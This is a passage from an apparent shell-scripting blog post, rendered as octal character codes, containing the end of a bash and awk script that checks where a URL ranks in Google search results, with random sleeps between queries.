040 055 166 040 156 165 155 075 044 156 165 155 040 055 166 040
142 141 163 145 075 044 142 141 163 145 040 047 173 040 151 146
040 050 040 044 061 040 176 040 057 136 150 164 164 160 057 040
051 040 160 162 151 156 164 040 142 141 163 145 054 156 165 155
053 053 054 044 116 106 040 175 047 174 141 167 153 040 047 173
040 151 146 040 050 040 044 062 040 074 040 061 060 040 051 040
160 162 151 156 164 040 042 107 157 157 147 154 145 040 111 156
144 145 170 040 116 165 155 142 145 162 040 042 040 044 061 040
042 060 042 040 044 062 040 042 040 106 157 162 040 120 141 147
145 072 040 042 040 044 063 073 040 145 154 163 145 040 151 146
040 050 040 044 062 040 075 075 040 061 060 060 040 051 040 160
162 151 156 164 040 042 107 157 157 147 154 145 040 111 156 144
145 170 040 116 165 155 142 145 162 040 042 040 044 061 053 061
040 042 060 060 040 106 157 162 040 120 141 147 145 072 040 042
040 044 063 073 145 154 163 145 040 160 162 151 156 164 040 042
107 157 157 147 154 145 040 111 156 144 145 170 040 116 165 155
142 145 162 040 042 040 044 061 040 044 062 040 042 040 106 157
162 040 120 141 147 145 072 040 042 040 044 063 040 175 047 174
147 162 145 160 040 055 151 040 044 165 162 154 073 151 146 040
133 040 044 077 040 055 156 145 040 060 040 135 073 164 150 145
156 040 154 145 164 040 163 164 141 162 164 075 044 163 164 141
162 164 053 061 060 060 073 151 146 040 133 040 044 163 164 141
162 164 040 055 145 161 040 061 060 060 060 040 135 073 164 150
145 156 040 156 157 164 137 146 157 165 156 144 075 061 073 151
146 040 133 040 044 156 157 164 137 146 157 165 156 144 040 055
145 161 040 061 040 135 073 164 150 145 156 040 142 162 145 141
153 073 146 151 073 146 151 073 154 145 164 040 142 141 163 145
075 044 142 141 163 145 053 061 073 146 151 162 163 164 137 160
141 147 145 075 060 073 145 154 163 145 040 142 162 145 141 153
073 146 151 073 154 145 164 040 163 154 145 145 160 137 164 151
155 145 075 044 173 122 101 116 104 117 115 175 057 066 060 060
073 145 143 150 157 040 042 116 157 164 040 111 156 040 124 157
160 040 044 163 164 141 162 164 040 122 145 163 165 154 164 163
072 040 123 154 145 145 160 151 156 147 040 044 163 154 145 145
160 137 164 151 155 145 040 163 145 143 157 156 144 163 056 056
056 042 073 163 154 145 145 160 040 044 163 154 145 145 160 137
164 151 155 145 073 144 157 156 145 073 151 146 040 133 040 044
156 157 164 137 146 157 165 156 144 040 055 145 161 040 061 040
135 073 164 150 145 156 040 145 143 150 157 040 042 116 157 164
040 106 157 165 156 144 040 111 156 040 106 151 162 163 164 040
061 054 060 060 060 040 111 156 144 145 170 040 122 145 163 165
154 164 163 040 055 040 107 157 157 147 154 145 047 163 040 110
141 162 144 040 114 151 155 151 164 042 073 145 143 150 157 073
146 151 073 145 143 150 157 040 042 117 165 164 040 117 146 040
101 160 160 162 157 170 151 155 141 164 145 154 171 040 044 156
165 155 137 162 145 163 165 154 164 163 040 122 145 163 165 154
164 163 042 073 145 143 150 157 073 145 170 151 164 040 060


, Mike




Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.